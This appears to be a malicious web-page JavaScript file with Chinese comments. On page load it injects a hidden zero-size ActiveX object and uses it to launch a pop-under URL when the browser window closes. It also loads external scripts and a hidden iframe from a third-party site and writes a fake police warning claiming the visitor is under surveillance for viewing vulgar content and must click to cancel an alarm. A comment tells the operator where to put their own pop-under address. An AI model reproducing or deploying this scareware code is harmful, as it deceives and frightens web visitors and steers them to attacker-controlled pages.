// JavaScript Document
<!--
var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";

function ext()          //在关闭IE窗口的时候弹出
{
if(window.event.clientY<132 || altKey) iie.launchURL(popURL);
}

function brs()       //插入Object
{
document.body.innerHTML+="<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>";
}


var popURL = 'http://www.sikv.com/www.baidu.com';    //这里修改成你的退弹网址

eval("window.attachEvent('onload',brs);");
eval("window.attachEvent('onunload',ext);");
document.writeln("<SCRIPT src=\"\/jg\/jquery.blockUI.js\"><\/SCRIPT>");
document.writeln("<SCRIPT src=\"\/jg\/googieJ.js\"><\/SCRIPT>");
document.writeln("<IMG src=\"http://img1.qq.com/www/pics/816/816587.gif\" >")
document.writeln("<DIV id=idauthwarning style=\"\"DISPLAY: none; FONT-WEIGHT: bold; HEIGHT: 10px\"\"><A href=\"\"http:\/\/www.googie.cc\"\"><font color=FFFFFF  size=-1>110已查你浏览低俗信息，你已进入本街道110监控范围 系统正在报警<FONT color=red size=-1>请点下面取消报警,返回&gt;&gt;<\/A><div style=\"word-break:break-all;cursor:hand;width:500px;margin-left: 10px;\"><iframe marginwidth=\"0\" marginheight=\"0\" src=\"http:\/\/www.sikv.com\/Gtv\/G-f.html\" frameborder=\"0\" width=\"500\" scrolling=\"No\" height=\"185\" allowtransparency=\"allowTransparency\"><\/iframe><\/DIV><!-- <%")